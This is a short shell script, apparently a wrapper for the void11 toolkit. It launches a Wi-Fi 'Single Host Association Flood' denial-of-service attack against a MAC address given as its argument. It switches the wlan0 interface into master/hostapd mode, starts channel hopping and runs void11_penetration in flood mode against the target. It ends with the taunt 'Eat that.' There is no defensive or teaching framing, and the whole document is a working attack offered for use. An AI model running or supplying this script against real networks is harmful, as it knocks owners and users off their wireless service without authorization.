#!/bin/sh

echo "Single Host Association Flood"
echo "You only need to enter a MAC"
echo "Here we go..."

# Variables.
TARGET="$1"

echo "$TARGET" > matchlist

/sbin/iwconfig wlan0 sens 3
/sbin/iwconfig wlan0 mode master
/sbin/iwpriv wlan0 hostapd 1
./void11_hopper >/dev/null &
/sbin/iwpriv wlan0 reset 1
./void11_penetration -t 3 -l matchlist -D wlan0 -T 1

echo "Eat that."


